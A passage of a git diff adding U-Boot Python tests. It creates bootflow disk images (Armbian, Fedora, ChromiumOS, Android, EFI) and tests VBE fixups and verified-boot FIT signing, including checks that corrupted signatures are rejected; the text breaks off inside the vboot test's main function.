${prefix}dtb/${fdtfile} +fdt addr ${fdt_addr_r} +fdt resize 65536 +for overlay_file in ${overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-${overlay_file}.dtbo; then + echo "Applying kernel provided DT overlay ${overlay_prefix}-${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +for overlay_file in ${user_overlays}; do + if load ${devtype} ${devnum} ${load_addr} ${prefix}overlay-user/${overlay_file}.dtbo; then + echo "Applying user provided DT overlay ${overlay_file}.dtbo" + fdt apply ${load_addr} || setenv overlay_error "true" + fi +done +if test "${overlay_error}" = "true"; then + echo "Error applying DT overlays, restoring original DT" + load ${devtype} ${devnum} ${fdt_addr_r} ${prefix}dtb/${fdtfile} +else + if load ${devtype} ${devnum} ${load_addr} ${prefix}dtb/rockchip/overlay/${overlay_prefix}-fixup.scr; then + echo "Applying kernel provided DT fixup script (${overlay_prefix}-fixup.scr)" + source ${load_addr} + fi + if test -e ${devtype} ${devnum} ${prefix}fixup.scr; then + load ${devtype} ${devnum} ${load_addr} ${prefix}fixup.scr + echo "Applying user provided fixup script (fixup.scr)" + source ${load_addr} + fi +fi +booti ${kernel_addr_r} ${ramdisk_addr_r} ${fdt_addr_r} + +# Recompile with: +# mkimage -C none -A arm -T script -d /boot/boot.cmd /boot/boot.scr +''' + bootdir = os.path.join(mnt, 'boot') + mkdir_cond(bootdir) + cmd_fname = os.path.join(bootdir, 'boot.cmd') + scr_fname = os.path.join(bootdir, 'boot.scr') + with open(cmd_fname, 'w', encoding='ascii') as outf: + print(script, file=outf) + + infname = os.path.join(ubman.config.source_dir, + 'test/py/tests/bootstd/armbian.bmp.xz') + bmp_file = os.path.join(bootdir, 'boot.bmp') + utils.run_and_log( + ubman, + ['sh', '-c', f'xz -dc {infname} >{bmp_file}']) + + mkimage = ubman.config.build_dir + '/tools/mkimage' + utils.run_and_log( + ubman, f'{mkimage} -C none -A arm -T script -d {cmd_fname} {scr_fname}') + + kernel = 'vmlinuz-5.15.63-rockchip64' + target = os.path.join(bootdir, kernel) + with open(target, 'wb') as outf: + print('kernel', outf) + + symlink = os.path.join(bootdir, 'Image') + if os.path.exists(symlink): + os.remove(symlink) + utils.run_and_log( + ubman, f'echo here {kernel} {symlink}') + os.symlink(kernel, symlink) + + fsfile = 'ext18M.img' + utils.run_and_log(ubman, f'fallocate -l 18M {fsfile}') + utils.run_and_log(ubman, f'mkfs.ext4 {fsfile} -d {mnt}') + utils.run_and_log(ubman, f'dd if={fsfile} of={fname} bs=1M seek=1') + utils.run_and_log(ubman, f'rm -rf {mnt}') + utils.run_and_log(ubman, f'rm -f {fsfile}') + +def setup_bootflow_image(ubman): + """Create a 20MB disk image with a single FAT partition""" + mmc_dev = 1 + fname, mnt = setup_image(ubman, mmc_dev, 0xc, second_part=True) + + vmlinux = 'vmlinuz-5.3.7-301.fc31.armv7hl' + initrd = 'initramfs-5.3.7-301.fc31.armv7hl.img' + dtbdir = 'dtb-5.3.7-301.fc31.armv7hl' + script = '''# extlinux.conf generated by appliance-creator +ui menu.c32 +menu autoboot Welcome to Fedora-Workstation-armhfp-31-1.9. Automatic boot in # second{,s}. Press a key for options. +menu title Fedora-Workstation-armhfp-31-1.9 Boot Options. +menu hidden +timeout 20 +totaltimeout 600 + +label Fedora-Workstation-armhfp-31-1.9 (5.3.7-301.fc31.armv7hl) + kernel /%s + append ro root=UUID=9732b35b-4cd5-458b-9b91-80f7047e0b8a rhgb quiet LANG=en_US.UTF-8 cma=192MB cma=256MB + fdtdir /%s/ + initrd /%s''' % (vmlinux, dtbdir, initrd) + ext = os.path.join(mnt, 'extlinux') + mkdir_cond(ext) + + conf = os.path.join(ext, 'extlinux.conf') + with open(conf, 'w', encoding='ascii') as fd: + print(script, file=fd) + + inf = os.path.join(ubman.config.persistent_data_dir, 'inf') + with open(inf, 'wb') as fd: + fd.write(gzip.compress(b'vmlinux')) + mkimage = ubman.config.build_dir + '/tools/mkimage' + utils.run_and_log( + ubman, f'{mkimage} -f auto -d {inf} {os.path.join(mnt, vmlinux)}') + + with open(os.path.join(mnt, initrd), 'w', encoding='ascii') as fd: + print('initrd', file=fd) + + mkdir_cond(os.path.join(mnt, dtbdir)) + + dtb_file = os.path.join(mnt, f'{dtbdir}/sandbox.dtb') + utils.run_and_log( + ubman, f'dtc -o {dtb_file}', stdin=b'/dts-v1/; / {};') + + fsfile = 'vfat18M.img' + utils.run_and_log(ubman, f'fallocate -l 18M {fsfile}') + utils.run_and_log(ubman, f'mkfs.vfat {fsfile}') + utils.run_and_log(ubman, ['sh', '-c', f'mcopy -i {fsfile} {mnt}/* ::/']) + utils.run_and_log(ubman, f'dd if={fsfile} of={fname} bs=1M seek=1') + utils.run_and_log(ubman, f'rm -rf {mnt}') + utils.run_and_log(ubman, f'rm -f {fsfile}') + +def setup_cros_image(ubman): + """Create a 20MB disk image with ChromiumOS partitions""" + Partition = collections.namedtuple('part', 'start,size,name') + parts = {} + disk_data = None + + def pack_kernel(ubman, arch, kern, dummy): + """Pack a kernel containing some fake data + + Args: + ubman (ConsoleBase): Console to use + arch (str): Architecture to use ('x86' or 'arm') + kern (str): Filename containing kernel + dummy (str): Dummy filename to use for config and bootloader + + Return: + bytes: Packed-kernel data + """ + kern_part = os.path.join(ubman.config.result_dir, + f'kern-part-{arch}.bin') + utils.run_and_log( + ubman, + f'futility vbutil_kernel --pack {kern_part} ' + '--keyblock doc/chromium/files/devkeys/kernel.keyblock ' + '--signprivate doc/chromium/files/devkeys/kernel_data_key.vbprivk ' + f'--version 1 --config {dummy} --bootloader {dummy} ' + f'--vmlinuz {kern}') + + with open(kern_part, 'rb') as inf: + kern_part_data = inf.read() + return kern_part_data + + def set_part_data(partnum, data): + """Set the contents of a disk partition + + This updates disk_data by putting data in the right place + + Args: + partnum (int): Partition number to set + data (bytes): Data for that partition + """ + nonlocal disk_data + + start = parts[partnum].start * sect_size + disk_data = disk_data[:start] + data + disk_data[start + len(data):] + + mmc_dev = 5 + fname = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'cgpt create {fname}') + + uuid_state = 'ebd0a0a2-b9e5-4433-87c0-68b6b72699c7' + uuid_kern = 'fe3a2a5d-4f32-41a7-b725-accc3285a309' + uuid_root = '3cb8e202-3b7e-47dd-8a3c-7ff2a13cfcec' + uuid_rwfw = 'cab6e88e-abf3-4102-a07a-d4bb9be3c1d3' + uuid_reserved = '2e0a753d-9e48-43b0-8337-b15192cb1b5e' + uuid_efi = 'c12a7328-f81f-11d2-ba4b-00a0c93ec93b' + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 0xb, 'label':'RWFW', 'type': uuid_rwfw, 'size': '1'}, + {'num': 6, 'label':'KERN_C', 'type': uuid_kern, 'size': '1'}, + {'num': 7, 'label':'ROOT_C', 'type': uuid_root, 'size': '1'}, + {'num': 9, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + {'num': 0xa, 'label':'reserved', 'type': uuid_reserved, 'size': '1'}, + + {'num': 2, 'label':'KERN_A', 'type': uuid_kern, 'size': '1M'}, + {'num': 4, 'label':'KERN_B', 'type': uuid_kern, 'size': '1M'}, + + {'num': 8, 'label':'OEM', 'type': uuid_state, 'size': '1M'}, + {'num': 0xc, 'label':'EFI-SYSTEM', 'type': uuid_efi, 'size': '1M'}, + + {'num': 5, 'label':'ROOT_B', 'type': uuid_root, 'size': '1'}, + {'num': 3, 'label':'ROOT_A', 'type': uuid_root, 'size': '1'}, + {'num': 1, 'label':'STATE', 'type': uuid_state, 'size': '1M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + utils.run_and_log( + ubman, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -t {part['type']} {fname}") + ptr += size + + utils.run_and_log(ubman, f'cgpt boot -p {fname}') + out = utils.run_and_log(ubman, f'cgpt show -q {fname}') + + # We expect something like this: + # 8239 2048 1 Basic data + # 45 2048 2 ChromeOS kernel + # 8238 1 3 ChromeOS rootfs + # 2093 2048 4 ChromeOS kernel + # 8237 1 5 ChromeOS rootfs + # 41 1 6 ChromeOS kernel + # 42 1 7 ChromeOS rootfs + # 4141 2048 8 Basic data + # 43 1 9 ChromeOS reserved + # 44 1 10 ChromeOS reserved + # 40 1 11 ChromeOS firmware + # 6189 2048 12 EFI System Partition + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + # Set up the kernel command-line + dummy = os.path.join(ubman.config.result_dir, 'dummy.txt') + with open(dummy, 'wb') as outf: + outf.write(b'BOOT_IMAGE=/vmlinuz-5.15.0-121-generic root=/dev/nvme0n1p1 ro quiet splash vt.handoff=7') + + # For now we just use dummy kernels. This limits testing to just detecting + # a signed kernel. We could add support for the x86 data structures so that + # testing could cover getting the cmdline, setup.bin and other pieces. + kern = os.path.join(ubman.config.result_dir, 'kern.bin') + with open(kern, 'wb') as outf: + outf.write(b'kernel\n') + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + # put x86 kernel in partition 2 and arm one in partition 4 + set_part_data(2, pack_kernel(ubman, 'x86', kern, dummy)) + set_part_data(4, pack_kernel(ubman, 'arm', kern, dummy)) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + return fname + +def setup_android_image(ubman): + """Create a 20MB disk image with Android partitions""" + Partition = collections.namedtuple('part', 'start,size,name') + parts = {} + disk_data = None + + def set_part_data(partnum, data): + """Set the contents of a disk partition + + This updates disk_data by putting data in the right place + + Args: + partnum (int): Partition number to set + data (bytes): Data for that partition + """ + nonlocal disk_data + + start = parts[partnum].start * sect_size + disk_data = disk_data[:start] + data + disk_data[start + len(data):] + + mmc_dev = 7 + fname = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'cgpt create {fname}') + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 1, 'label':'misc', 'size': '1M'}, + {'num': 2, 'label':'boot_a', 'size': '4M'}, + {'num': 3, 'label':'boot_b', 'size': '4M'}, + {'num': 4, 'label':'vendor_boot_a', 'size': '4M'}, + {'num': 5, 'label':'vendor_boot_b', 'size': '4M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + utils.run_and_log( + ubman, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -l {part['label']} -t basicdata {fname}") + ptr += size + + utils.run_and_log(ubman, f'cgpt boot -p {fname}') + out = utils.run_and_log(ubman, f'cgpt show -q {fname}') + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + test_abootimg.AbootimgTestDiskImage(ubman, 'bootv4.img', test_abootimg.boot_img_hex) + boot_img = os.path.join(ubman.config.result_dir, 'bootv4.img') + with open(boot_img, 'rb') as inf: + set_part_data(2, inf.read()) + + test_abootimg.AbootimgTestDiskImage(ubman, 'vendor_boot.img', test_abootimg.vboot_img_hex) + vendor_boot_img = os.path.join(ubman.config.result_dir, 'vendor_boot.img') + with open(vendor_boot_img, 'rb') as inf: + set_part_data(4, inf.read()) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + print(f'wrote to {fname}') + + mmc_dev = 8 + fname = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + utils.run_and_log(ubman, f'qemu-img create {fname} 20M') + utils.run_and_log(ubman, f'cgpt create {fname}') + + ptr = 40 + + # Number of sectors in 1MB + sect_size = 512 + sect_1mb = (1 << 20) // sect_size + + required_parts = [ + {'num': 1, 'label':'misc', 'size': '1M'}, + {'num': 2, 'label':'boot_a', 'size': '4M'}, + {'num': 3, 'label':'boot_b', 'size': '4M'}, + ] + + for part in required_parts: + size_str = part['size'] + if 'M' in size_str: + size = int(size_str[:-1]) * sect_1mb + else: + size = int(size_str) + utils.run_and_log( + ubman, + f"cgpt add -i {part['num']} -b {ptr} -s {size} -l {part['label']} -t basicdata {fname}") + ptr += size + + utils.run_and_log(ubman, f'cgpt boot -p {fname}') + out = utils.run_and_log(ubman, f'cgpt show -q {fname}') + + # Create a dict (indexed by partition number) containing the above info + for line in out.splitlines(): + start, size, num, name = line.split(maxsplit=3) + parts[int(num)] = Partition(int(start), int(size), name) + + with open(fname, 'rb') as inf: + disk_data = inf.read() + + test_abootimg.AbootimgTestDiskImage(ubman, 'boot.img', test_abootimg.img_hex) + boot_img = os.path.join(ubman.config.result_dir, 'boot.img') + with open(boot_img, 'rb') as inf: + set_part_data(2, inf.read()) + + with open(fname, 'wb') as outf: + outf.write(disk_data) + + print(f'wrote to {fname}') + + return fname + +def setup_cedit_file(ubman): + """Set up a .dtb file for use with testing expo and configuration editor""" + infname = os.path.join(ubman.config.source_dir, + 'test/boot/files/expo_layout.dts') + inhname = os.path.join(ubman.config.source_dir, + 'test/boot/files/expo_ids.h') + expo_tool = os.path.join(ubman.config.source_dir, 'tools/expo.py') + outfname = 'cedit.dtb' + utils.run_and_log( + ubman, f'{expo_tool} -e {inhname} -l {infname} -o {outfname}') + +@pytest.mark.buildconfigspec('ut_dm') +def test_ut_dm_init(ubman): + """Initialize data for ut dm tests.""" + + fn = ubman.config.source_dir + '/testflash.bin' + if not os.path.exists(fn): + data = b'this is a test' + data += b'\x00' * ((4 * 1024 * 1024) - len(data)) + with open(fn, 'wb') as fh: + fh.write(data) + + fn = ubman.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + + # Create a file with a single partition + fn = ubman.config.source_dir + '/scsi.img' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + utils.run_and_log( + ubman, f'sfdisk {fn}', stdin=b'type=83') + + fs_helper.mk_fs(ubman.config, 'ext2', 0x200000, '2MB', None) + fs_helper.mk_fs(ubman.config, 'fat32', 0x100000, '1MB', None) + + mmc_dev = 6 + fn = os.path.join(ubman.config.source_dir, f'mmc{mmc_dev}.img') + data = b'\x00' * (12 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + + +def setup_efi_image(ubman): + """Create a 20MB disk image with an EFI app on it""" + devnum = 1 + basename = 'flash' + fname, mnt = setup_image(ubman, devnum, 0xc, second_part=True, + basename=basename) + + efi_dir = os.path.join(mnt, 'EFI') + mkdir_cond(efi_dir) + bootdir = os.path.join(efi_dir, 'BOOT') + mkdir_cond(bootdir) + efi_src = os.path.join(ubman.config.build_dir, + 'lib/efi_loader/testapp.efi') + efi_dst = os.path.join(bootdir, 'BOOTSBOX.EFI') + with open(efi_src, 'rb') as inf: + with open(efi_dst, 'wb') as outf: + outf.write(inf.read()) + fsfile = 'vfat18M.img' + utils.run_and_log(ubman, f'fallocate -l 18M {fsfile}') + utils.run_and_log(ubman, f'mkfs.vfat {fsfile}') + utils.run_and_log(ubman, ['sh', '-c', f'mcopy -vs -i {fsfile} {mnt}/* ::/']) + utils.run_and_log(ubman, f'dd if={fsfile} of={fname} bs=1M seek=1') + utils.run_and_log(ubman, f'rm -rf {mnt}') + utils.run_and_log(ubman, f'rm -f {fsfile}') + +@pytest.mark.buildconfigspec('cmd_bootflow') +@pytest.mark.buildconfigspec('sandbox') +def test_ut_dm_init_bootstd(ubman): + """Initialise data for bootflow tests""" + + setup_bootflow_image(ubman) + setup_bootmenu_image(ubman) + setup_cedit_file(ubman) + setup_cros_image(ubman) + setup_android_image(ubman) + setup_efi_image(ubman) + + # Restart so that the new mmc1.img is picked up + ubman.restart_uboot() + + +def test_ut(ubman, ut_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + u-boot.sym. The list entries are created using the C macro UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + ubman (ConsoleBase): U-Boot console + ut_subtest (str): test to be executed via command ut, e.g 'foo bar' to + execute command 'ut foo bar' + """ + + if ut_subtest == 'hush hush_test_simple_dollar': + # ut hush hush_test_simple_dollar prints "Unknown command" on purpose. + with ubman.disable_check('unknown_command'): + output = ubman.run_command('ut ' + ut_subtest) + assert 'Unknown command \'quux\' - try \'help\'' in output + else: + output = ubman.run_command('ut ' + ut_subtest) + assert output.endswith('failures: 0') diff --git a/test/py/tests/test_vbe.py b/test/py/tests/test_vbe.py new file mode 100644 index 00000000000..a1f32f375b6 --- /dev/null +++ b/test/py/tests/test_vbe.py @@ -0,0 +1,119 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import pytest + +import fit_util + +# Define a base ITS which we can adjust using % and a dictionary +base_its = ''' +/dts-v1/; + +/ { + description = "Example kernel"; + + images { + kernel-1 { + data = /incbin/("%(kernel)s"); + type = "kernel"; + arch = "sandbox"; + os = "linux"; + load = <0x40000>; + entry = <0x8>; + compression = "%(compression)s"; + + random { + compatible = "vbe,random-rand"; + vbe,size = <0x40>; + vbe,required; + }; + aslr1 { + compatible = "vbe,aslr-move"; + vbe,align = <0x100000>; + }; + aslr2 { + compatible = "vbe,aslr-rand"; + }; + efi-runtime { + compatible = "vbe,efi-runtime-rand"; + }; + wibble { + compatible = "vbe,wibble"; + }; + }; + + fdt-1 { + description = "snow"; + data = /incbin/("%(fdt)s"); + type = "flat_dt"; + arch = "sandbox"; + load = <%(fdt_addr)#x>; + compression = "%(compression)s"; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel-1"; + fdt = "fdt-1"; + }; + }; +}; +''' + +# Define a base FDT - currently we don't use anything in this +base_fdt = ''' +/dts-v1/; + +/ { + chosen { + }; +}; +''' + +# This is the U-Boot script that is run for each test. First load the FIT, +# then run the 'bootm' command, then run the unit test which checks that the +# working tree has the required things filled in according to the OS requests +# above (random, aslr2, etc.) +base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +bootm prep +fdt addr +fdt print +ut bootstd -f vbe_test_fixup_norun +''' + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.requiredtool('dtc') +def test_vbe(ubman): + kernel = fit_util.make_kernel(ubman, 'vbe-kernel.bin', 'kernel') + fdt = fit_util.make_dtb(ubman, base_fdt, 'vbe-fdt') + fdt_out = fit_util.make_fname(ubman, 'fdt-out.dtb') + + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : 0x1000, + + 'compression' : 'none', + } + mkimage = ubman.config.build_dir + '/tools/mkimage' + fit = fit_util.make_fit(ubman, mkimage, base_its, params, 'test-vbe.fit', + base_fdt) + params['fit'] = fit + cmd = base_script % params + + with ubman.log.section('Kernel load'): + output = ubman.run_command_list(cmd.splitlines()) + + assert 'failures: 0' in output[-1] diff --git a/test/py/tests/test_vbe_vpl.py b/test/py/tests/test_vbe_vpl.py new file mode 100644 index 00000000000..f011b034f63 --- /dev/null +++ b/test/py/tests/test_vbe_vpl.py @@ -0,0 +1,39 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC +# +# Test addition of VBE + +import os + +import pytest +import utils + +@pytest.mark.boardspec('sandbox_vpl') +@pytest.mark.requiredtool('dtc') +def test_vbe_vpl(ubman): + #cmd = [ubman.config.build_dir + fname, '-v'] + ram = os.path.join(ubman.config.build_dir, 'ram.bin') + fdt = os.path.join(ubman.config.build_dir, 'arch/sandbox/dts/test.dtb') + image_fname = os.path.join(ubman.config.build_dir, 'image.bin') + + # Enable firmware1 and the mmc that it uses. These are needed for the full + # VBE flow. + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /bootstd/firmware0 status disabled') + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /bootstd/firmware1 status okay') + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /mmc3 status okay') + utils.run_and_log( + ubman, f'fdtput -t s {fdt} /mmc3 filename {image_fname}') + + # Remove any existing RAM file, so we don't have old data present + if os.path.exists(ram): + os.remove(ram) + flags = ['-p', image_fname, '-w', '-s', 'state.dtb'] + ubman.restart_uboot_with_flags(flags) + + # Make sure that VBE was used in both VPL (to load SPL) and SPL (to load + # U-Boot + output = ubman.run_command('vbe state') + assert output == 'Phases: VPL SPL' diff --git a/test/py/tests/test_vboot.py b/test/py/tests/test_vboot.py new file mode 100644 index 00000000000..7a7f9c379de --- /dev/null +++ b/test/py/tests/test_vboot.py @@ -0,0 +1,643 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. +# +# U-Boot Verified Boot Test + +""" +This tests verified boot in the following ways: + +For image verification: +- Create FIT (unsigned) with mkimage +- Check that verification shows that no keys are verified +- Sign image +- Check that verification shows that a key is now verified + +For configuration verification: +- Corrupt signature and check for failure +- Create FIT (with unsigned configuration) with mkimage +- Check that image verification works +- Sign the FIT and mark the key as 'required' for verification +- Check that image verification works +- Corrupt the signature +- Check that image verification no-longer works + +For pre-load header verification: +- Create FIT image with a pre-load header +- Check that signature verification succeeds +- Corrupt the FIT image +- Check that signature verification fails +- Launch an FIT image without a pre-load header +- Check that image verification fails + +Tests run with both SHA1 and SHA256 hashing. + +This also tests fdt_add_pubkey utility in the simple way: +- Create DTB and FIT files +- Add keys with fdt_add_pubkey to DTB +- Sign FIT image +- Check with fit_check_sign that keys properly added to DTB file +""" + +import os +import shutil +import struct +import pytest +import utils +import vboot_forge +import vboot_evil + +# Common helper functions +def dtc(dts, ubman, dtc_args, datadir, tmpdir, dtb): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + ubman: U-Boot console. + dtc_args: DTC arguments. + datadir: Path to data directory. + tmpdir: Path to temp directory. + dtb: Resulting DTB file. + """ + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, 'dtc %s %s%s -O dtb ' + '-o %s%s' % (dtc_args, datadir, dts, tmpdir, dtb)) + +def make_fit(its, ubman, mkimage, dtc_args, datadir, fit): + """Make a new FIT from the .its source file. + + This runs 'mkimage -f' to create a new FIT. + + Args: + its: Filename containing .its source. + ubman: U-Boot console. + mkimage: Path to mkimage utility. + dtc_args: DTC arguments. + datadir: Path to data directory. + fit: Resulting FIT file. + """ + utils.run_and_log(ubman, [mkimage, '-D', dtc_args, '-f', + '%s%s' % (datadir, its), fit]) + +# Only run the full suite on a few combinations, since it doesn't add any more +# test coverage. +TESTDATA_IN = [ + ['sha1-basic', 'sha1', '', None, False, True, False, False], + ['sha1-pad', 'sha1', '', '-E -p 0x10000', False, False, False, False], + ['sha1-pss', 'sha1', '-pss', None, False, False, False, False], + ['sha1-pss-pad', 'sha1', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-basic', 'sha256', '', None, False, False, False, False], + ['sha256-pad', 'sha256', '', '-E -p 0x10000', False, False, False, False], + ['sha256-pss', 'sha256', '-pss', None, False, False, False, False], + ['sha256-pss-pad', 'sha256', '-pss', '-E -p 0x10000', False, False, False, False], + ['sha256-pss-required', 'sha256', '-pss', None, True, False, False, False], + ['sha256-pss-pad-required', 'sha256', '-pss', '-E -p 0x10000', True, True, False, False], + ['sha384-basic', 'sha384', '', None, False, False, False, False], + ['sha384-pad', 'sha384', '', '-E -p 0x10000', False, False, False, False], + ['algo-arg', 'algo-arg', '', '-o sha256,rsa2048', False, False, True, False], + ['sha256-global-sign', 'sha256', '', '', False, False, False, True], + ['sha256-global-sign-pss', 'sha256', '-pss', '', False, False, False, True], +] + +# Mark all but the first test as slow, so they are not run with '-k not slow' +TESTDATA = [TESTDATA_IN[0]] +TESTDATA += [pytest.param(*v, marks=pytest.mark.slow) for v in TESTDATA_IN[1:]] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +@pytest.mark.requiredtool('openssl') +@pytest.mark.parametrize("name,sha_algo,padding,sign_options,required,full_test,algo_arg,global_sign", + TESTDATA) +def test_vboot(ubman, name, sha_algo, padding, sign_options, required, + full_test, algo_arg, global_sign): + """Test verified boot signing with mkimage and verification with 'bootm'. + + This works using sandbox only as it needs to update the device tree used + by U-Boot to hold public keys from the signing process. + + The SHA1 and SHA256 tests are combined into a single test since the + key-generation process is quite slow and we want to avoid doing it twice. + """ + def dtc_options(dts, options): + """Run the device tree compiler to compile a .dts file + + The output file will be the same as the input file but with a .dtb + extension. + + Args: + dts: Device tree file to compile. + options: Options provided to the compiler. + """ + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, 'dtc %s %s%s -O dtb -o %s%s %s' % + (dtc_args, datadir, dts, tmpdir, dtb, options)) + + def run_binman(dtb): + """Run binman to build an image + + Args: + dtb: Device tree file used as input file. + """ + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/../scripts/dtc/pylibfdt' % tmpdir + utils.run_and_log(ubman, [binman, 'build', '-d', "%s/%s" % (tmpdir,dtb), + '-a', "pre-load-key-path=%s" % tmpdir, '-O', + tmpdir, '-I', tmpdir]) + os.environ['PYTHONPATH'] = pythonpath + + def run_bootm(sha_algo, test_type, expect_string, boots, fit=None): + """Run a 'bootm' command U-Boot. + + This always starts a fresh U-Boot instance since the device tree may + contain a new public key. + + Args: + test_type: A string identifying the test type. + expect_string: A string which is expected in the output. + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + boots: A boolean that is True if Linux should boot and False if + we are expected to not boot + fit: FIT filename to load and verify + """ + if not fit: + fit = '%stest.fit' % tmpdir + ubman.restart_uboot() + with ubman.log.section('Verified boot %s %s' % (sha_algo, test_type)): + output = ubman.run_command_list( + ['host load hostfs - 100 %s' % fit, + 'fdt addr 100', + 'bootm 100']) + assert expect_string in ''.join(output) + if boots: + assert 'sandbox: continuing, as we cannot run' in ''.join(output) + else: + assert('sandbox: continuing, as we cannot run' + not in ''.join(output)) + + def sign_fit(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def sign_fit_dtb(sha_algo, options, dtb): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, '-r', fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def sign_fit_norequire(sha_algo, options): + """Sign the FIT + + Signs the FIT and writes the signature into it. It also writes the + public key into the dtb. It does not mark key as 'required' in dtb. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + options: Options to provide to mkimage. + """ + args = [mkimage, '-F', '-k', tmpdir, '-K', dtb, fit] + if options: + args += options.split(' ') + ubman.log.action('%s: Sign images' % sha_algo) + utils.run_and_log(ubman, args) + + def replace_fit_totalsize(size): + """Replace FIT header's totalsize with something greater. + + The totalsize must be less than or equal to FIT_SIGNATURE_MAX_SIZE. + If the size is greater, the signature verification should return false. + + Args: + size: The new totalsize of the header + + Returns: + prev_size: The previous totalsize read from the header + """ + total_size = 0 + with open(fit, 'r+b') as handle: + handle.seek(4) + total_size = handle.read(4) + handle.seek(4) + handle.write(struct.pack(">I", size)) + return struct.unpack(">I", total_size)[0] + + def corrupt_file(fit, offset, value): + """Corrupt a file + + To corrupt a file, a value is written at the specified offset + + Args: + fit: The file to corrupt + offset: Offset to write + value: Value written + """ + with open(fit, 'r+b') as handle: + handle.seek(offset) + handle.write(struct.pack(">I", value)) + + def create_rsa_pair(name): + """Generate a new RSA key paid and certificate + + Args: + name: Name of of the key (e.g. 'dev') + """ + public_exponent = 65537 + + if sha_algo == "sha384": + rsa_keygen_bits = 3072 + else: + rsa_keygen_bits = 2048 + + utils.run_and_log(ubman, 'openssl genpkey -algorithm RSA -out %s%s.key ' + '-pkeyopt rsa_keygen_bits:%d ' + '-pkeyopt rsa_keygen_pubexp:%d' % + (tmpdir, name, rsa_keygen_bits, public_exponent)) + + # Create a certificate containing the public key + utils.run_and_log(ubman, 'openssl req -batch -new -x509 -key %s%s.key ' + '-out %s%s.crt' % (tmpdir, name, tmpdir, name)) + + def test_with_algo(sha_algo, padding, sign_options): + """Test verified boot with the given hash algorithm. + + This is the main part of the test code. The same procedure is followed + for both hashing algorithms. + + Args: + sha_algo: Either 'sha1' or 'sha256', to select the algorithm to + use. + padding: Either '' or '-pss', to select the padding to use for the + rsa signature algorithm. + sign_options: Options to mkimage when signing a fit 